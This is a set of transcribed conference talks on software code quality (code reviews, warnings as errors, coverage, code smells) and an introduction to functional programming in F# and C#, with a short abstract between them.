it's a good message to have he said well I was just pulling your leg I can't tell you how many variables we have there are single letter our code just sucks everywhere you look at it so I'm really glad you mentioned about four months later I went back to the company to teach another course the same guy comes to me and says oh Venkat remember I spoke to you last time yeah I do remember that well I want you to know that you made a difference I was so proud of it I said really he said yes you talked about not using single letters thank you for that now we use only two letters right it's extremely difficult to kill habits right bad habits so it's important to really work actively to create good variable names short methods and short classes you know single responsibility principle at the class level single responsibility principle at the method level we need to think about those things but one of the best ways to create good code is to read good code honestly most programmers don't even know how a good code looks because all that they have done is seen bad code over and over and over so if you find a good code don't keep quiet immediately call the team and say isn't that beautiful appreciate it right say how beautiful this code is and explain why you see the beauty in this code that is well worth the steps to take and others can learn from that and say ah this is the reason why this code is nice and we can learn from replicating 
some of these things as good quality of code so learn from reading good code and keep it simple how do you really make things simple that is a challenge right but I may make something simple and then make it simpler but a simplicity really is a way to learn that is by kind of looking at our gut feelings how do you feel about this code I know this is not very scientific approach but listen to yourself how do you feel about it and with experience that kind of comes along the way as well and learn from writing test and test with high coverage and run all the test before you check in that's a rule we maintain in our teams is we will never check in code unless all the test that we have passed and that kind of is a way to you know do quality but also to check in frequently sometimes programmers keep the code around for weeks and this is kind of scary and you want to check in code very frequently now what's good about checking code very frequently others can start to use it others can start to look at it it can improve right away and if you by the way the first thing I would recommend doing never use a version control system where you can lock files that is so 20th century right we should never do that so if your source control allows you to lock a file and gain ownership of it fire the source control system you want a system which never allows you to lock then what happens you got to check in very frequently what happens if you don't check in frequently you wait for a few days you go to check in your code and you realize that there have been so many check ins and you got to worry about merging this file so rule number one of coding you should never get merged hell you should only give it right so you absolutely have to deal with it so never get merged hell always give it so frequent reviews really help quite a bit in that regard and promote a little bit of agility as well learn your language and oftentimes programmers begin to use a language but they haven't really gained the strength of the programming language and when you ask them a deep question they kind of give you all kinds of weird answers that doesn't cut it you got to really know the language you are programming in because that's our profession right and so as a result we have to take the time so read the books on the language play with it blog read blogs about it have a time with other fellow developers where you question them if something is not clear as them how would it work why does this work and that's a good question to ask and if you're switching languages are working with multiple languages you got to know the differences between them as well and it's important to avoid the cargo cult where you just do things because that's the way it was done previously we somehow sometimes have to question and change the way we do things and we have to really court feedback and criticism from people that is very important in terms of keeping things simple really ask is this really necessary can I do something minimal to really solve the problem I know as of now and sometimes programmers do this they built a root Goldberg machine which is extremely complex and you look at this and you're scared about this code right and I remember a day when I was looking at a piece of code it was 250 lines of code to receive an X data and process and create an XML only for that to be sent to another function which was parsing it again to insert it back into the database I'm sitting there asking why am I doing this and the programmer said what if you ever 
want this to be extensible? Well, but what do we know about extensibility today? Nothing. Then why are we wasting all this time and effort doing stuff we don't need to do? Let's only focus on what we know right now and maintain the code for that. So there is a beautiful quote by Hoare here. It says there are two ways of constructing a software design: one way is to make it so simple that there are obviously no deficiencies, and the other way is to make it so complicated that there are no obvious deficiencies. This reminds me of an experience. I was at a client site reading through a piece of code which was extremely hard to understand. I'm wading through the code, long methods, complicated logic, single letter variables, I'm scratching my head, and as I was trying to understand this code I eventually discovered they had a huge concurrency issue in it. This code should not be working correctly, by the way. And when I pointed this out, one of the programmers got very angry at me, and the programmer said, hey Venkat, this code has been in production for three years, what makes you think you can come in and scare us that this code is not correct today? How do you respond to that? Well, thankfully I didn't have to, because before I could answer one of the fellow programmers said, yeah, but remember, every three weeks it'll crash and we don't know why. So yeah, that is the question, right? The code is so complex you don't even know what the problem is in there and you cannot get to the point. So there are certain things you can do as an individual. What can you do as a team of programmers? First, avoid shortcuts. I know we are all tempted to do this along the way, but avoid shortcuts wherever you can and say, you know, maybe this is the time to take a little bit of time and do this correctly, and let's spend the time to do this. Take collective ownership. Do not let one person own the code. There should never be John's code and Sarah's code; it is the team's code. Anybody who has the responsibility, and can take the responsibility, to modify the code and ensure all the tests pass should be able to modify the code. Collective ownership is extremely important to me. And promote positive interaction. Now this is not too easy, but we certainly have to try. The words we speak, how we communicate with other people, makes a huge difference. So rather than making people feel bad about the code they wrote, let's elevate them so they feel good about writing better code and making good changes in the software, and provide constructive feedback. For example, don't tell people your code sucks; instead tell them, hey, why don't you break this method into two methods? So don't tell them what is done poorly, tell them what could be done better. That is a much better way of solving the problem. If that is a better way to do it, they can use it, or if they have an even better way to do it, they can always come back with it. So I have a recommendation: don't tell people what's wrong, instead tell people how it could be better. That's a better way to communicate most of the time. And do constant code reviews. I know what you're thinking. You're thinking, are you serious, you are telling us to do code reviews? Yeah, absolutely. Code reviews are by far the most proven way to develop better quality software. And don't take this out of context, I want to emphasize it, but given a choice between writing tests and code review, I value code review more. I'm not telling you I don't value writing tests, please don't take that in that context, but between these two I value code review
a lot more and the reason is by far I've seen this to be the most effective way to really review and and improve the quality of code so this is extremely useful and I know what you're thinking you're saying yeah but code reviews never work I know what happened the last time you tried code review right you in all good faith you want to do code review you you you started doing that on your project but the day you want to do code review you sent a meeting announcement saying hey Thursday afternoon at three o'clock is the code review in room you know 1.23 and immediately or the guy whose code is going to be reviewed is thinking wait a minute that is called bash James day because everybody is going to keep there and tell how his code is sucking and he is like maybe I should call and seek that day I don't want to be at work in the meantime you know Julie is thinking I already am behind schedule I would rather sit and write my code than looking at the sticking code that James wrote in the meantime the project manager freaks out he says wait a minute code review that's the time that you did last time and we had a fight we had to call the cops and we had to shut down the company no code review for you right because code reviews have turned into a highly political and emotional endeavor and nobody wants to do it but we do code reviews all the time we not only review code we also review test cases and I work with some fantastic programmers most of the time I have no comments on their code at all but I would come back to them and say hey you need to really add these three test cases that you're missing but how in the world can you do that like I said we do this all the time and and the way we do this is is a very simple we use what is called a tactical code review rather than a team based code review so in first rule of thumb there is nobody on the team who is so great that their code doesn't have to be reviewed so we don't have this hierarchy we don't have the priest in the company that says I'm better than everybody else absolutely not everybody's code needs to be reviewed the second thing we do is if I write a piece of code as soon as I finish my task I'm gonna ask him to review the code only him and in the meantime the code he writes he is gonna review in the meantime the code he wrote she is gonna review it so we do this very tactical code review the next time I finish a task I'm not going to give it to him to review but I'm going to give it to her for review so we rotate the people who review the code and reviewing the code is part of everybody's responsibility we don't distinguish senior programmers and junior programmers in that well guess what if a junior programmer doesn't understand your code you're in as much trouble if not more than when a senior programmer doesn't understand your code so we rotate the review from among people so when I write a piece of code he reviews the first time the second task I finish he reviews it and we rotate among the team of people and you cannot say I don't have time to review code that's part of your responsibility if you don't review the code your code is waiting for somebody else to review as well so that is a time we spend along the way to review the code and improve the quality not only we review the code we also review the test cases along the way and do that as well now one of the reasons to do this is is explained really well by this code by a gentleman named Brian and he said oh we do this all the time in our company when I explain this and I said 
well if that is what you do tell me how you benefit from it and he nailed it he said we do code reviews because code reviews make me a hero or make me smarter I thought about this and said wow that's awesome hey Brian can I steal those words from you he said absolutely go ahead use it and then I said now you have to explain it to me what does it mean and he said code reviews make me a hero because when I give a code review to him to review he comes back and says oh darn it I've never seen that being done that way I learned something now so it improves him and he is beginning to understand the code a little differently a better way to write software but most of the time the other person comes to me and says oh you should really handle this you should really do this you should name this better and it makes me smarter because I'm learning from the code reviews he is providing so overall code reviews can be extremely beneficial and and if you ask me if there's one single change I can make to developing software that would be code reviews it is something it's very practical to do but it requires people to have the right attitude and we have done this and in projects where we did this the number of bugs we got in the code could be counted with fingers in one hand that's how few we had in parts that did not get review we had thousands of bugs in the system with comparable amount of code so there is absolutely no other recommendation I can make enough that's how convinced I am about this and I was on projects where I was also in our shoring roles where somebody wrote code elsewhere and I had to different to the clients and the easiest way I could defend to these things was every single line of code written was reviewed from both sides and I would write code and they would review it they would write code I would review it and the reason was now we were familiar with the code along the way as well and that helped us a great deal so I cannot emphasize this enough and so rigorous code review it definitely is important and it removes up to 90% of errors in the software as Bob Glass talks about in his in his book so the second recommendation for a team is treat warnings as errors now you know if you really ask yourselves how many of you have seen errors warnings in your code quite a few of us right almost everybody raises the hand and a lot of times you come to the project and you compile it and you see warnings and you say wow really and then what do you do you on the first day of the project right you are genuinely so motivated and you tell yourself I'm gonna fix all of those and then you look at how many there are and then you change your mind is like no not for me right and but what happens I was on a project and and this was a brand new project for me it's been around for a while for the company and I compiled the code and there were tons of warnings and I'm like really warnings and I thought to myself you know what they hired me to write code not to fix warnings I'm gonna ignore it a few minutes later my mind is kind of saying but I wonder what those warnings are I'm really curious right I'm inquisitive so I look at one warning I was scared it said if flag a single equals true this is in production code right I'm like no way how could this be a warning right this is not a warning this is not even an error this is something where the compiler should drag the program by the caller give a slap to him and say don't do that right and this was in production code how could this be left over there now I 
was shaking what else is there I don't know and I start looking at more warnings in the system and they are very very scary so the very first thing I would say is treat warnings as errors so if there is a warning your compiler stops and says I will not build this anymore okay that's great news and I was how do you do this I was suggesting to turn on a flag in visual studio to treat warning as errors and I had one guy in my team he said oh don't do that don't waste your time I was quite upset for a second I said what do you mean why don't you want to do this he said because somebody would turn off the flag one afternoon and continue to write code for three hours with warnings on it what a waste I said do you have something better to do he said absolutely I'm gonna walk up to the continuous integration machine and turn on warnings as errors because that's such a great recommendation I went up and hugged him right absolutely that is the right way to do because then nobody can slip code in there without with warnings in it I was mentioning this to a company and I was you know hearing people giggle in the back of the room so I said all right guys you seem to not like this idea and they said of course not this is terrible suggestion I said why so why is that such a terrible idea and they said well what if you are working in a legacy code oh I believe you guys have warnings and they laughed at me I said how many warnings you have they said how about a lot of warnings I said okay how about a thousand warnings and they said you don't understand the word lot do you and I'm like okay I won't ask you the numbers and I said okay you got a lot of warnings let's call it x we don't know that number that will remain unnamed and then I asked them in six months period have you had more warnings or fewer warnings and they all kind of said of course we have more warnings today than we did six months ago and what are you doing about it and they all kind of shrugged and said what do you think we can do about it so that is the very wrong way to look at it right you know if you are inheriting code that is really bad there's a name for it it's called karma right karma is your deeds you inherit things right and you cannot change your karma but you cannot say guess what you guys gave me bad code I'm going to make it worse in six months for you how about that that is professionally wrong right morally wrong so what do you do the so what I recommend to do them is the first thing you do is whatever that number is x I don't care what that number is write a stupid script I mean we as programmers can do this right write a stupid script and the script measures the number of warnings today and that becomes your value x put that script as part of your continuous integration and every time you check in code it looks for the number of warnings if the number of warnings is x or less it keeps quiet the minute the number of warnings is more than x it fails the build so what does that tell you that you added one more warning than that x number of large number of warnings you had in your code when you do remove a warning then the script resets its index x to x minus one and now you start seeing this get better over time and I mentioned this to him about three four years ago and I kind of walked away I was back at this company about six months ago and one of the developers came to me and you said they have several modules in their application today there are no warnings for the first time in 15 years and there are other modules where 
they still have a lot of warnings but for the first time the number of warnings is decreasing over time so my argument is it is not at all or nothing proposition you can make things better incrementally in those cases nobody in the right mind would say stop all business go fix the x number of warnings where x is large number for the next three months that is not practical but if you put in place a way to measure the number of warnings and promise that you will not create any new warnings in the system I would guarantee in six months you would have fewer warnings than you started out with and you begin to improve the quality of software as time goes on so in terms of complexity of code keep an eye on the code look for various things I am a huge fan of code coverage I know number of people who tell me that's a bad idea don't look at it but every time I look at a piece of code that has a low coverage I see a smelly code sitting in there so let me tell you how I use code coverage to me code coverage is like cholesterol number I go to the doctor and the doctor looks at me and says oh Venkat your cholesterol number is so high this is very unhealthy and I say what should I do doc well you should exercise you should eat right take this medicines come back in six months and I exercise eat right come go back in six months and the doc looks at me and says oh here are your numbers oh wonderful great job Venkat your cholesterol number is really good now immediately I set a piece of paper to him and say could you please sign here what's this 30k of good health and the doctor says no I can't do that your cholesterol number is good doesn't mean you are in good health I know this is not very encouraging right it's exactly the same your code coverage number is poor you have a problem if your code coverage number is really good you don't have that problem anymore right so it doesn't mean everything is good it doesn't reflect a better quality of code but the lack of it definitely reflects problems you have to address so when I look at it from that point of view I'm quite comfortable looking at the code coverage and I use this quite effectively and there are several tools you could use but when people argue with me and say all right I'm really right writing code here for the life of me I cannot figure out how to reach in and test this code and I usually have one recommendation for them that they seem to really not understand very well and I tell them if you don't know how to test the code why don't you remove it right well after all you're not testing that code doesn't matter it's not there right then you figure out a way to write a test for it and then write a code for it if you don't have the courage to do that I've got a suggestion for you there's a tool very appropriately named as Guantanamo it goes through your source control and deletes code with no test on it and some projects I'm scared to use it it may leave an empty drive behind right so absolutely try that and see what happens and get rid of the code that's not being covered by test cases so we talked about code coverage reduce complexity of code as much as you can how do you reduce complexity one way is to have code reviews have other people look at it if you want to use tools for this there are certain tools you could use that analyzes the code and looks at the path of the code to make this decision one of them is the Thomas McCabe index that looks at the node points and decision points through the code and determines the complexity of code but 
unfortunately though complexity is simply not adequate because complexity may say a problem in code but it can be compounded by other things you may argue this code is really complex for a reason but I've written a thousand tests on it I'm like okay I can live with that maybe you know temporarily with that so let's look at it a little differently let's say for a minute that I'm looking at actually I'll come back to them in a minute so you certainly want to look at the complexity of code but you want to really look at it in terms of the relationship of the code also in other words the code that's very highly complex is really hard to test as well and we really have to really break it down into simple things but in terms of code itself we have to keep it small now of course we all know we have to keep code small how many of you think that long methods are a great idea raise your hand if you do nobody is raising the hand right nobody here things long methods are good usually one person raises the hand and I ask him why he says because it's more efficient and you got to give credit that's true but that's when Nixon was the president but a lot of things have changed since then right it's a different architecture in line you know all these things have evolved so here is a different question for you at work how many of you have seen long methods look at that for a minute just look around for a minute right almost everybody here raises the hand this is called cognitive dissonance right we all know writing long methods is wrong but we all see long methods but I know how that happens because none of you here have written those long methods I know that the people who wrote those long methods are at work today making those methods longer as we speak which is kind of scary right so absolutely we got to put an end to it so if there's a second recommendation I can make for you other than code review is avoid long methods now how long is a method when it is long and somebody says 20 lines somebody says 30 lines and there's always the Ruby guys who say seven lines right how do you know what the number of lines says you say well here's an idea a method is short enough you can if you can fit the entire method into one window and don't try to lower the font size right okay that's another metric you could create but if you really want to think about it it is not the number of lines of code that matters what really matters for the length of the method is the method should do one thing and be at one level of abstraction in the code that is the real key so as long as your method can be focused at one level of abstraction then you'd usually answer being relatively small and so make it cohesive single responsibility principle and one level of abstraction is very critical for us to do keep it dry remote duplication of code duplicated code is one of the other ways we can improve software quality by removing the duplication so actively find there are tools that you could use for example there's a tool called PMD for Java Simeon for.net the word Simeon means monkey meaning you monkey with the code so you can do analysis Simeon analysis and find out where the code is duplicated and you can remove actively duplicated code in the system but if you really want to address the quality of software let's think about this a little differently if I tell you my code is low complexity and I tell you that the code is really having low automated tests then I would argue that the risk is fairly high because a code that is not tested 
is a risky code, because what happens when you modify the code? Think about that for a minute. What happens when you change the code when you don't have tests? That's exactly the reaction. You do this and you go to the programmers and say, does your code work after you changed it, and the programmer says something wonderful. The programmer says, I hope. What a beautiful word, but there is a name for it. That's called JDD. It stands for Jesus driven development, right? It's okay to have faith in the Lord, that's a good thing, but I don't want to trouble the Lord with the silly code I write. I want TDD, not JDD, right? So when you have low automated test coverage in your code it becomes extremely hard, and you have to rely on hope and shrugs, and there is no feedback cycle to tell you that your code works. Automated tests tell you not only that the code worked before but that it continues to work as you evolve it. So if you have low complexity code with low coverage, I rate it as a high risk. But what if I have low complexity and high coverage? That is the beautiful land you want to live in, right? That's great. What if you have high complexity and low automated test coverage? That is an even higher risk; this is the world you don't want to even dream of in your nightmares. And then of course high coverage and high complexity is all right. But how do you really explain this to the team and say your code really is in bad shape? So there is actually an interesting metric for it. It is called change risk analysis and prediction, and it is a wonderful metric. What the change risk analysis and prediction metric says is: I'm going to analyze the complexity of your code, I'm going to look at the coverage of your code in terms of tests, and I'm going to put those together and measure the so-called crap threshold, and the crap threshold says that your code has moved into crappy territory. So you don't have to tell the team the code is crappy, you can show it to them now, right? And there are tools like crap4j and crap4n that measure these values for you and tell you what the value of the crappy threshold is. So you could use tools like this to measure the quality of software and gain an impression of quality as well. Take a look at some of those tools. And as this beautiful quote says, it was on one of my journeys between the EDSAC room and the punching equipment that the realization came over me with full force that a good part of the remainder of my life was going to be spent in finding errors in my own programs. That is pure courage, isn't it? And that is a realization we have to arrive at as programmers, that we have to deal with it. So we have to deal with code smell. Kent Beck coined this term called code smell. What a beautiful metaphor, code smell. Why is this a great metaphor? Because you enter a room and your nose twitches a little bit because you smell something, and you say, it smells funny here, isn't it? And everybody in the room kind of looks at you and says, really? Because nobody feels anything. And you sit there and start working, and you kind of look around like, it's really smelling here, isn't it? And thirty minutes goes by and you don't feel that anymore, your senses have dulled down and you're part of that smelly environment, and the next guy walks in: isn't it smelly here? And you look up and join the other people: really? Right? So that is why it's such a great metaphor. What happens when you join a project? The first day on the project you look at this code and say, who the heck
wrote this code and you join the project six months later you don't feel a thing you are writing code in the product right and we tend to lose senses over time so it's important to be sensitive to this and clear up things as soon as we can otherwise we kind of get lull in the senses and we kind of tend to lose that so look at the code smells and identify that what are some of the code smells you can think of duplication in code for example unnecessary complexity in code and various other factors you can take a look at right so how do you deal with code smell keep an eye on it pay attention to it clean it up schedule time for paying those technical debt as well you say you know what that code is smelly I'm not going to do it right now but I'm going to schedule time for it to be cleared right so this is something we could learn from William Zinser I'm not going to spend time on it but he talks about some ways to really make good communication writing English and he talks about simplicity clarity brevity and humanity and those recommendations really are good for writing code as well I want you to kind of take a look at it later on second thing I would say is throw exceptions but be careful when you should throw exceptions sometimes people just throw exceptions all the time I would evaluate this very clearly given a situation and decide whether it's the right thing second thing don't write clever code write clear code I can't tell you how many times I've been bitten by writing clever code and when you write clever code you think it's really cool but nobody else understands it and then it comes back to haunt you so I used to write clever code these days the minute I write the code if I feel it's clever I immediately delete it and I start over because it's so scary it gives me problems eventually and don't rush to write code take the time writing quality code takes time to build and you have to devote the time to do it you cannot do it in a rush what about commenting code I have to tell you commenting code is one of my pet peeves and a lot of times comments are pretty useless comments are often written to cover a bad code I want comment to tell me why the code exists I want the comment to tell me something that I cannot just learn from reading the code so type of comments are really really hate for example so one example this is this nothing makes me angry more than this somebody writes a class class car and then they write public car and then constructor it's like very important thank you right or even better right there was a day I was looking at a piece of code it said I plus plus with the beautiful increment I'm like so thank you so much for clarifying that I was just not sure looking at the code right these are absolutely useless so instead focus on writing comments that tell you something extremely useful about why it even exist in place so to me a good code is like a good joke when was the last time you said a joke and nobody understood it and you start to explain it and they got it so the number rule of rule number one rule of telling joke never explain a joke right because they didn't get a joke you say let me explain it to you and they listen to you painfully and say yeah what's funny about that and then you try let me explain it to you it gets very painful right a good code is like that you just say it and it's got a click and they get it if they don't get it what do you do you go home that night that night and you refactor your joke and that's exactly what you do with the code right 
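To make the comment examples above concrete, here is roughly the kind of commenting being described: the constructor comment and the increment comment add nothing, while a comment that explains why the code exists is worth keeping. The retry scenario and the SendWithRetry helper are purely hypothetical, invented for illustration.

    public class Car
    {
        // constructor          (restates what the declaration already says)
        public Car() { }
    }

    public class CommentExamples
    {
        public string Check(int i, string request)
        {
            i++; // increment i  (another comment that tells the reader nothing new)

            // A useful comment explains why, not what:
            // retry once because the upstream gateway occasionally drops the first call.
            return SendWithRetry(request, attempts: 2);
        }

        // Hypothetical helper, here only so the sketch compiles.
        private string SendWithRetry(string request, int attempts) => request;
    }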
Don't comment the code; rewrite it, refactor it so it's easier for people to understand. So make the code self-documenting. I saw code at a client site which was very painful to see. This was code that was extremely scientific, very hard to maintain, and as I was reviewing the code I saw somebody had commented, God help, I have no idea what this means. And their entire application had these fields which were L1, L2; it was extremely scientific, and you can imagine what it takes to maintain that software. So give good names and make it clear and self-documenting, so you don't have to really write comments for those things. And finally, to talk about it, throw the error in your face. Don't ask people to go dig through log files to find errors; make it very easy for them to approach it and find it. So I want to summarize what we talked about with about ten points we can take away, as the final thoughts to leave you with. The first thing is, practice tactical, peer-based code review. I cannot overemphasize that, I already did, but I want to emphasize it: practical, tactical code review is very important. Consider untested code as unfinished code. I believe in automated tests. It takes a certain amount of effort to write these tests, but the investment pays off hugely; it is well worth spending the time and effort to do that. Make your code coverage and metrics visible. This is so useful, I can tell you. If you push this out onto monitors near your coffee machine, as people walk around they look at the visible code coverage and bug count and metrics, and now there is a pressure on everybody to do better, and even better, right? If I come to the coffee machine, my project's code metrics are displayed, his project's code metrics are displayed, and his are so much better than mine, guess what I'm going to do? I'm going to run to him and say, hey, great job, you guys, you're doing really well on your project, I saw the metrics. Oh well, thank you very much, he's very modest, right? And I say, no, no, no, please tell me, what are you guys doing? This is one thing that bothers me a lot. I walk into large companies as a consultant, I talk to one group of people doing some wonderful things, and in the afternoon they will say go talk to this team, and that team has no knowledge of what is happening on the second floor. I would say, guys, the guys on the second floor are doing this. Really? They don't talk to each other. By putting this out you're making people aware of what others are doing and where to go for information, between companies and between teams. Don't tolerate anyone trashing your code. Take it very seriously. If somebody breaks your build or writes poor quality code, immediately go back and say, hey, what's going on here, how can I help to make this better? We don't want this kind of poor quality code here, let's improve this together. And write self-documenting code, and comment why and not what it does; we talked about that. Instill such quality in the code, automate as much as you can, and continuously measure this along the way. And treat warnings as errors, I talked about this already. And keep it really small, as much as you can, and keep it as simple as you can. You can take a look at some of these references later on. Thank you very much for your time, I really appreciate it.
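For new code, the simplest form of the treat-warnings-as-errors advice in the summary above is the compiler setting itself, for example the TreatWarningsAsErrors property in a .NET project file or the equivalent switch on the continuous integration build. For a legacy code base, a minimal sketch of the warning ratchet described earlier might look like the following; the file names, and the assumption that each compiler warning shows up in the build log as a line containing ": warning ", are illustrative guesses rather than anything prescribed in the talk.

    // CI step: fail the build if the warning count ever goes up, and ratchet the
    // allowed budget down whenever it goes down. File names are assumptions.
    using System;
    using System.IO;
    using System.Linq;

    class WarningRatchet
    {
        static int Main()
        {
            int budget = int.Parse(File.ReadAllText("warning-budget.txt"));
            int current = File.ReadLines("build.log")
                              .Count(line => line.Contains(": warning "));

            if (current > budget)
            {
                Console.Error.WriteLine($"Build failed: {current} warnings, budget is {budget}.");
                return 1; // somebody added a new warning
            }
            if (current < budget)
            {
                File.WriteAllText("warning-budget.txt", current.ToString()); // lock in the improvement
            }
            Console.WriteLine($"Warnings: {current}, budget: {budget}.");
            return 0;
        }
    }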
|
We all have seen our share of bad code. We certainly have come across some good code as well. What are the characteristics of good code? How can we identify them? What practices can help us write and maintain more of that good quality code? This presentation will focus on this topic, which has a major impact on our ability to be agile and succeed.
|
10.5446/50995 (DOI)
|
All right. Good morning. Welcome to the session on Thinking in Functional Style in F-sharp and some C-sharp. My name is Venkat Subramaniam. We're going to talk about functional programming. Best time to ask a question or make a comment is when you have it. So please don't wait in the very end. Just about any time is a great time for questions, comments. If you do have a question or a comment, do draw my attention. If you raise your hand, I may not be able to see you. So just start speaking or just call out my name or make some noise that draws my attention towards you and I'll yield to you and respond to your question or comment. We're going to talk about functional programming. I'm going to do a little bit of talking, quite a bit of coding. I'm not going to use any slides here in this presentation. I'm going to just write some code, play with some examples. I'll write a little bit more F-sharp than C-sharp, but certainly I'll show you some features in C-sharp. Pretty much what we're going to talk about here, you could be doing it in almost any language today on the modern operating systems and most of the platforms today. So with Lambda Expressions available in most languages, it shouldn't be a problem at all. So let's start with functional programming. So what is a functional language? Before I get to the question, it kind of intrigues me to even think about this. If some languages are functional, does it mean other languages are dysfunctional? It kind of makes me wonder, right? So what's a functional language? What is it really about? So if you go back to thinking about programming and back in time, structured programming, one of the things that Dykstra talked about was go-to's are evil. Every time somebody writes a go-to statement, Dykstra moves in his grave, right? Because you don't want to be writing go-to statements, but it doesn't mean that go-to's doesn't happen in the code. In a similar way, one of the things that functional programming talks about is to write assignment-less programming. And when it comes to assignment-less programming, you really want to program with immutability where nothing really changes. And that really puts a little bit of a burden on us because then we are focusing on thinking about how in the world do I really write any practical application where nothing really changes. So even though immutability is a very important part of functional programming, that is not really the most important opinion. It's really about transformation of state rather than mutability of state. And that's kind of what I want to arrive at today in this discussion. So I'll start out by talking about functional programming just a little bit. We'll spend a little bit of time about mutability and immutability. Then we'll talk about pure functions. We'll talk about higher-order functions. And then we'll talk about a few ways to use these higher-order functions in writing code that shows the difference between imperative style versus functional style of coding. And then, of course, eventually, finally, we'll talk about how we could actually apply this to some real example. We'll take an example of function composition that shows how elegantly we can put this together to do something useful. So in terms of functional programming itself, there is this concept of function purity that we are interested in developing. And when it comes to programming, this really has been around. So let's take a look at an example for a minute. Don't worry about being wrong. 
I'm wrong most of the time, or my wife says that quite often. But the question is, what year do you think object-oriented programming was created? Just throw a number at me. Very close enough, 1967. When do you think most people got excited about OOP? Not last week. Not in Bob's talk yesterday. When was it? Nineties, right? Early nineties, late eighties. And what made that happen? It's OK. You can say it, C++, right? Yeah, C++ made that happen. And certainly, it took a good 23 years for this concept to really become mainstream. If OOP was a human, it had a terrible childhood, right? Nobody wanted to even look at this guy until 23 years old. Oh, isn't he cute? Let's pay attention to this guy, right? And functional programming has been around even longer. We're about 50 years now, scary. And finally, we are paying attention to it. Why so? And the reason is, about 2003 timeframe, an engineer walked up his boss and said, it ran really fast before it melted. He was talking about the chips. And we had to really go to multi-core processors. Well, OK, what's the big deal? We could program multi-threading in most of the languages today. What difference does it make? Well, it turns out on a single processor, multi-threading is more multitasking. On a multi-core processor, you really have threads running on steroids concurrently. And it turns out that developing concurrent applications in traditional way is extremely difficult. It is very error-prone. So what is causing this error? One of the things that causes this error is the so-called shared mutability. And shared mutability really is a big deal because when you think about mutability, mutability itself is not a big deal, right? You're modifying some data. What about sharing? Sharing is a good thing. Remember what mom told you, right? Share, that's a good thing to do. But shared mutability is devil's work. And the minute you bring shared mutability into picture, you have to worry about making sure multiple threads don't collide and crash and change the data at the same time and the code becomes extremely complex. And what do you do to avoid this problem? You start putting locks around your code. And when you do that, just because you put locks doesn't mean your code is correct. And there is no language today. There is no environment today that tells you that you have done the locking correctly at the right place at the right time to the right degree. And so most of the concurrent applications out there are broken and we just don't know it. It's extremely hard to write such code. One way to solve this problem is to remove the problem at the very fundamental root and that is to really create what is called a pure functional code. A pure functional code is a code that doesn't modify anything. Now functional programming has been exciting for two categories of people. One is mathematicians and people who are interested in proving correctness of code. I don't think anybody here is interested in correctness code, right? We are interested in living on the edge. Who cares about correctness, right? Well, but they care about it. They want to know if the code is correct and it's easier to prove correctness of a code if it doesn't mutate anything. It's easier to, you know, establish concepts in that regard. But the other reason why purity is interesting is imagine for a minute that you have two expressions on your hand. This brings back fond memories, by the way. 
This was a long time ago, several years ago. I was working on a project, a C++ application, and we had a wonderful programmer, and he screamed one evening. He had found out that there was one expression in our application that was yielding wrong results. It was giving an error at the seventh decimal place. You know what, I would have ignored that for the most part, but this guy was so meticulous, he spent three nights in the room working on this problem. How do we know? Nobody could go near him, right? He hadn't showered for three days. And this guy comes out after three days and says, I found the problem: some moron had written this code where they are incrementing the variable twice in one expression. And Bjarne Stroustrup, in his book, clearly says don't do this. And the reason is because it's very difficult to predict the sequence in which these operations have to happen. So in other words, when code has mutability in place, it's extremely hard to predict the behavior of the code. But imagine for a minute I have two expressions on my hand where the expressions don't depend on each other, but the net result of them is going to be used further down in the chain. What I can do as a compiler is say I want to run expression one first and then run expression two. That's perfectly fine. But I also, at will, can decide to run expression two first and then run expression one. Or, more interesting, I can delegate these two expressions to run concurrently across multiple cores if I want to. And this, by the way, is called referential transparency. In other words, if functions are pure, it's much easier for referential transparency to be implemented. It becomes a lot easier to work with the code. So functional code is much safer to work with in this particular context. So one of the major problems is shared mutable state. Now, unfortunately, in languages like Java and C Sharp it's a common practice to use mutability in code. But better languages actually don't allow you to do that. If you consider a pure functional language, in a pure functional language you will never be able to modify a variable once you create it. But F Sharp is not a pure functional language; it's a hybrid functional language, because it allows you to do stuff like you do in C Sharp, more of an imperative style with mutability, but it also allows you to code in a functional style if you're interested. So for example, if I were to create a variable called temperature over here, and let's say set the value to maybe 25 degrees, as the weather mostly is this week, we could then say print out the value of the temperature for me, and I could say here is the temperature value, and sure enough, it is 25. I change the value of temperature, lower it just a little bit to a more comfortable level maybe, and then we want to ask what the temperature is. Again, we can say give me the value of temperature, and as you see, the temperature value did not change at all. Now you're wondering what in the world happened here. And the reason is that what really was happening on line number four is not an assignment, but rather a comparison operation.
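The live code itself is not in the transcript, so the following is only a rough reconstruction of the sequence being typed here and walked through in the next few sentences, written as an F# script (where shadowing a binding is allowed), with the layout arranged so the comparison falls on line four as in the narration.

    let temperature = 25
    printfn "temperature: %d" temperature    // prints 25

    temperature = 15                         // line 4: not an assignment; '=' compares and yields false
    printfn "temperature: %d" temperature    // still prints 25

    printfn "%b" (temperature = 15)          // false

    // Mutation has to be asked for explicitly, and it uses a different operator:
    let mutable temperature = 25             // shadowing the earlier binding, fine in a script or F# Interactive
    temperature <- 15
    printfn "temperature: %d" temperature    // now prints 15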
So for example, if I were to put a print statement before this and ask what the value in this particular context is, you will notice that it tells me that it is false, and the reason is that the value of temperature right now is not equal to 15. So as we are used to the equals in a language like C-sharp, we kind of look at it like an assignment, but it's really a comparison operation. In other words, variables are unbound, and the minute they are bound, you can only compare them. But if you really want mutability, you can do that in C-sharp also, and in F-sharp also, and the way to do that is to create a variable that allows mutation. But F-sharp wants to shame you a little bit for doing that, so it forces you to use a special keyword called mutable, so you kind of hang your head low when you do this and say, yes, I really am creating a mutable variable. And then of course you can modify the variable, and then you can say temperature is 15, and you are able to modify the variable using a different syntax in this particular case. So F-sharp really allows mutability, but it is not the preferred way. I like this because it's easy to quickly grep the code and look for places where you are using mutable variables, do a quick code review and say, hey, why can't we rewrite this, refactor this code so that it's more immutable in nature. So it's easier to grasp this than not having a special syntax for the purpose. So mutability is really a critical thing, but what about this purity of functions? So in terms of functional style of programming, I'm going to draw two distinctions here. Imagine drawing two circles, a small circle and a bigger circle, and the small circle, of course, is more encompassing, it contains more features, and the bigger circle is a little looser and has fewer features. At the outer circle, I'm going to put words like higher order functions, and what that means is you can create functions within functions, return functions from functions, and you can send functions to functions and so on. In other words, you can compose your application using functions. If you draw that outer circle as higher order functions, a lot of languages fit into that outer circle today. For example, F-sharp fits into that outer circle. C-sharp fits into the outer circle today because of lambda expressions. Java 8 will fit into that circle. Groovy, Scala, you know, so many other languages you can think of fit into that outer circle. Erlang, Haskell, Clojure, all of those fit into it. But the inner circle I want to draw is a more restrictive circle where the language enforces purity, and only a few languages come into that inner circle, languages that really 